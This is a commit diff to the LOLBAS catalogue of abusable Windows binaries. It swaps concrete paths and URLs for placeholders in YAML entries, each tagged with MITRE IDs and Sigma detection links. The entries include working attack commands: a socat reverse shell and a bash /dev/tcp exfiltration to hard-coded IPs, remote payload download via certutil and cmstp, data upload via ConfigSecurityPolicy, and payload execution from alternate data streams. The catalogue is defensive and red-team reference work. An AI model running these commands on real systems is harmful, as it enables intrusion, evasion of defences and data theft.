Generalising file paths and urls, see #10 (#422)

yml/OSBinaries/AppInstaller.yml

@@ -4,7 +4,7 @@ Description: Tool used for installation of AppX/MSIX applications on Windows 10
 Author: 'Wade Hickey'
 Created: 2020-12-02
 Commands:
-  - Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw
+  - Command: start ms-appinstaller://?source={REMOTEURL:.exe}
     Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in INetCache.
     Usecase: Download file from Internet
     Category: Download

yml/OSBinaries/At.yml

@@ -4,7 +4,7 @@ Description: Schedule periodic tasks
 Author: 'Freddie Barr-Smith'
 Created: 2019-09-20
 Commands:
-  - Command: C:\Windows\System32\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe
+  - Command: C:\Windows\System32\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su {CMD}
     Description: Create a recurring task to execute every day at a specific time.
     Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive
     Category: Execute

yml/OSBinaries/Atbroker.yml

@@ -1,7 +1,7 @@
 ---
 Name: Atbroker.exe
 Description: Helper binary for Assistive Technology (AT)
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
   - Command: ATBroker.exe /start malware

yml/OSBinaries/Bash.yml

@@ -1,11 +1,11 @@
 ---
 Name: Bash.exe
 Description: File used by Windows subsystem for Linux
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: bash.exe -c calc.exe
-    Description: Executes calc.exe from bash.exe
+  - Command: bash.exe -c "{CMD}"
+    Description: Executes executable from bash.exe
     Usecase: Performs execution of specified file, can be used as a defensive evasion.
     Category: Execute
     Privileges: User
@@ -14,15 +14,15 @@ Commands:
     Tags:
       - Execute: CMD
   - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
-    Description: Executes a reverseshell
+    Description: Executes a reverse shell
     Usecase: Performs execution of specified file, can be used as a defensive evasion.
     Category: Execute
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows 10
     Tags:
       - Execute: CMD
-  - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
+  - Command: bash.exe -c 'cat {PATH:.zip} > /dev/tcp/192.168.1.10/24'
     Description: Exfiltrate data
     Usecase: Performs execution of specified file, can be used as a defensive evasion.
     Category: Execute
@@ -31,8 +31,8 @@ Commands:
     OperatingSystem: Windows 10
     Tags:
       - Execute: CMD
-  - Command: bash.exe -c calc.exe
-    Description: Executes calc.exe from bash.exe
+  - Command: bash.exe -c "{CMD}"
+    Description: Executes executable from bash.exe
     Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
     Category: AWL Bypass
     Privileges: User
@@ -43,8 +43,6 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\bash.exe
   - Path: C:\Windows\SysWOW64\bash.exe
-Code_Sample:
-  - Code:
 Detection:
   - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
   - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml

yml/OSBinaries/Bitsadmin.yml

@@ -1,7 +1,7 @@
 ---
 Name: Bitsadmin.exe
 Description: Used for managing background intelligent transfer
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
   - Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1

yml/OSBinaries/Certoc.yml

@@ -4,7 +4,7 @@ Description: Used for installing certificates
 Author: 'Ensar Samil'
 Created: 2021-10-07
 Commands:
-  - Command: certoc.exe -LoadDLL "C:\test\calc.dll"
+  - Command: certoc.exe -LoadDLL {PATH_ABSOLUTE:.dll}
     Description: Loads the target DLL file
     Usecase: Execute code within DLL file
     Category: Execute
@@ -13,7 +13,7 @@ Commands:
     OperatingSystem: Windows Server 2022
     Tags:
       - Execute: DLL
-  - Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1
+  - Command: certoc.exe -GetCACAPS {REMOTEURL:.ps1}
     Description: Downloads text formatted files
     Usecase: Download scripts, webshells etc.
     Category: Download

yml/OSBinaries/Certreq.yml

@@ -1,18 +1,18 @@
 ---
 Name: CertReq.exe
 Description: Used for requesting and managing certificates
-Author: 'David Middlehurst'
+Author: David Middlehurst
 Created: 2020-07-07
 Commands:
-  - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
-    Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory
+  - Command: CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE} {PATH:.txt}
+    Description: Send the specified file (penultimate argument) to the specified URL via HTTP POST and save the response to the specified txt file (last argument).
     Usecase: Download file from Internet
     Category: Download
     Privileges: User
     MitreID: T1105
     OperatingSystem: Windows 10, Windows 11
-  - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini
-    Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST and show response in terminal
+  - Command: CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE}
+    Description: Send the specified file (last argument) to the specified URL via HTTP POST and show response in terminal.
     Usecase: Upload
     Category: Upload
     Privileges: User
@@ -21,8 +21,6 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\certreq.exe
   - Path: C:\Windows\SysWOW64\certreq.exe
-Code_Sample:
-  - Code:
 Detection:
   - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml
   - IOC: certreq creates new files

yml/OSBinaries/Certutil.yml

@@ -1,46 +1,46 @@
 ---
 Name: Certutil.exe
 Description: Windows binary used for handling certificates
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
-    Description: Download and save 7zip to disk in the current folder.
+  - Command: certutil.exe -urlcache -split -f {REMOTEURL:.exe} {PATH:.exe}
+    Description: Download and save executable to disk in the current folder.
     Usecase: Download file from Internet
     Category: Download
     Privileges: User
     MitreID: T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe
-    Description: Download and save 7zip to disk in the current folder.
+  - Command: certutil.exe -verifyctl -f -split {REMOTEURL:.exe} {PATH:.exe}
+    Description: Download and save executable to disk in the current folder.
     Usecase: Download file from Internet
     Category: Download
     Privileges: User
     MitreID: T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
+  - Command: certutil.exe -urlcache -split -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt
     Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
     Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
     Category: ADS
     Privileges: User
     MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: certutil -encode inputFileName encodedOutputFileName
+  - Command: certutil -encode {PATH} {PATH:.base64}
     Description: Command to encode a file using Base64
     Usecase: Encode files to evade defensive measures
     Category: Encode
     Privileges: User
     MitreID: T1027.013
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: certutil -decode encodedInputFileName decodedOutputFileName
+  - Command: certutil -decode {PATH:.base64} {PATH}
     Description: Command to decode a Base64 encoded file.
     Usecase: Decode files to evade defensive measures
     Category: Decode
     Privileges: User
     MitreID: T1140
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: certutil -decodehex encoded_hexadecimal_InputFileName decodedOutputFileName
-    Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
+  - Command: certutil -decodehex {PATH:.hex} {PATH}
+    Description: Command to decode a hexadecimal-encoded file.
     Usecase: Decode files to evade defensive measures
     Category: Decode
     Privileges: User
@@ -49,8 +49,6 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\certutil.exe
   - Path: C:\Windows\SysWOW64\certutil.exe
-Code_Sample:
-  - Code:
 Detection:
   - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml
   - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml

yml/OSBinaries/Cmd.yml

@@ -4,28 +4,28 @@ Description: The command-line interpreter in Windows
 Author: Ye Yint Min Thu Htut
 Created: 2019-06-26
 Commands:
-  - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
+  - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:{REMOTEURL:.sct} ^scrobj.dll > {PATH}:payload.bat
     Description: Add content to an Alternate Data Stream (ADS).
     Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
     Category: ADS
     Privileges: User
     MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: cmd.exe - < fakefile.doc:payload.bat
+  - Command: cmd.exe - < {PATH}:payload.bat
     Description: Execute payload.bat stored in an Alternate Data Stream (ADS).
     Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
     Category: ADS
     Privileges: User
     MitreID: T1059.003
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: type \\webdav-server\folder\file.ext > C:\Path\file.ext
+  - Command: type {PATH_SMB} > {PATH_ABSOLUTE}
     Description: Downloads a specified file from a WebDAV server to the target file.
     Usecase: Download/copy a file from a WebDAV server
     Category: Download
     Privileges: User
     MitreID: T1105
     OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: type C:\Path\file.ext > \\webdav-server\folder\file.ext
+  - Command: type {PATH_ABSOLUTE} > {PATH_SMB}
     Description: Uploads a specified file to a WebDAV server.
     Usecase: Upload a file to a WebDAV server
     Category: Upload

yml/OSBinaries/Cmdkey.yml

@@ -1,7 +1,7 @@
 ---
 Name: Cmdkey.exe
 Description: creates, lists, and deletes stored user names and passwords or credentials.
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
   - Command: cmdkey /list

yml/OSBinaries/Cmdl32.yml

@@ -1,7 +1,7 @@
 ---
 Name: cmdl32.exe
 Description: Microsoft Connection Manager Auto-Download
-Author: 'Elliot Killick'
+Author: Elliot Killick
 Created: 2021-08-26
 Commands:
   - Command: cmdl32 /vpn /lan %cd%\config

yml/OSBinaries/Cmstp.yml

@@ -1,10 +1,10 @@
 ---
 Name: Cmstp.exe
 Description: Installs or removes a Connection Manager service profile.
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
+  - Command: cmstp.exe /ni /s {PATH_ABSOLUTE:.inf}
     Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
     Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet.
     Category: Execute
@@ -13,7 +13,7 @@ Commands:
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
     Tags:
       - Execute: INF
-  - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
+  - Command: cmstp.exe /ni /s {REMOTEURL:.inf}
     Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
     Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
     Category: AWL Bypass

yml/OSBinaries/Colorcpl.yml

@@ -1,10 +1,10 @@
 ---
 Name: Colorcpl.exe
 Description: Binary that handles color management
-Author: 'Arjan Onwezen'
+Author: Arjan Onwezen
 Created: 2023-06-26
 Commands:
-  - Command: colorcpl file.txt
+  - Command: colorcpl {PATH}
     Description: Copies the referenced file to C:\Windows\System32\spool\drivers\color\.
     Usecase: Copies file(s) to a subfolder of a generally trusted folder (c:\Windows\System32), which can be used to hide files or make them blend into the environment.
     Category: Copy

yml/OSBinaries/ConfigSecurityPolicy.yml

@@ -1,17 +1,17 @@
 ---
 Name: ConfigSecurityPolicy.exe
-Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
+Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. You can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
 Author: Ialle Teixeira
 Created: 2020-09-04
 Commands:
-  - Command: ConfigSecurityPolicy.exe C:\Windows\System32\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
+  - Command: ConfigSecurityPolicy.exe {PATH_ABSOLUTE} {REMOTEURL}
     Description: Upload file, credentials or data exfiltration in general
     Usecase: Upload file
     Category: Upload
     Privileges: User
     MitreID: T1567
     OperatingSystem: Windows 10
-  - Command: ConfigSecurityPolicy.exe https://example.com/payload
+  - Command: ConfigSecurityPolicy.exe {REMOTEURL}
     Description: It will download a remote payload and place it in INetCache.
     Usecase: Downloads payload from remote server
     Category: Download
@@ -23,8 +23,6 @@ Commands:
 Full_Path:
   - Path: C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe
   - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe
-Code_Sample:
-  - Code:
 Detection:
   - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml
   - IOC: ConfigSecurityPolicy storing data into alternate data streams.

yml/OSBinaries/Conhost.yml

@@ -4,17 +4,17 @@ Description: Console Window host
 Author: Wietze Beukema
 Created: 2022-04-05
 Commands:
-  - Command: "conhost.exe calc.exe"
-    Description: Execute calc.exe with conhost.exe as parent process
+  - Command: conhost.exe {CMD}
+    Description: Execute a command line with conhost.exe as parent process
     Usecase: Use conhost.exe as a proxy binary to evade defensive counter-measures
     Category: Execute
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows 10, Windows 11
     Tags:
       - Execute: CMD
-  - Command: "conhost.exe --headless calc.exe"
-    Description: Execute calc.exe with conhost.exe as parent process
+  - Command: conhost.exe --headless {CMD}
+    Description: Execute a command line with conhost.exe as parent process
     Usecase: Specify --headless parameter to hide child process window (if applicable)
     Category: Execute
     Privileges: User

yml/OSBinaries/Control.yml

@@ -1,10 +1,10 @@
 ---
 Name: Control.exe
 Description: Binary used to launch controlpanel items in Windows
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: control.exe c:\windows\tasks\file.txt:evil.dll
+  - Command: control.exe {PATH_ABSOLUTE}:evil.dll
     Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS).
     Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
     Category: ADS
@@ -13,8 +13,8 @@ Commands:
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
     Tags:
       - Execute: DLL
-  - Command: control.exe c:\windows\tasks\evil.cpl
-    Description: Execute evil.cpl payload. A CPL is a DLL file with CPlApplet export function)
+  - Command: control.exe {PATH_ABSOLUTE:.cpl}
+    Description: Execute .cpl file. A CPL is a DLL file with CPlApplet export function)
     Usecase: Use to execute code and bypass application whitelisting
     Category: Execute
     Privileges: User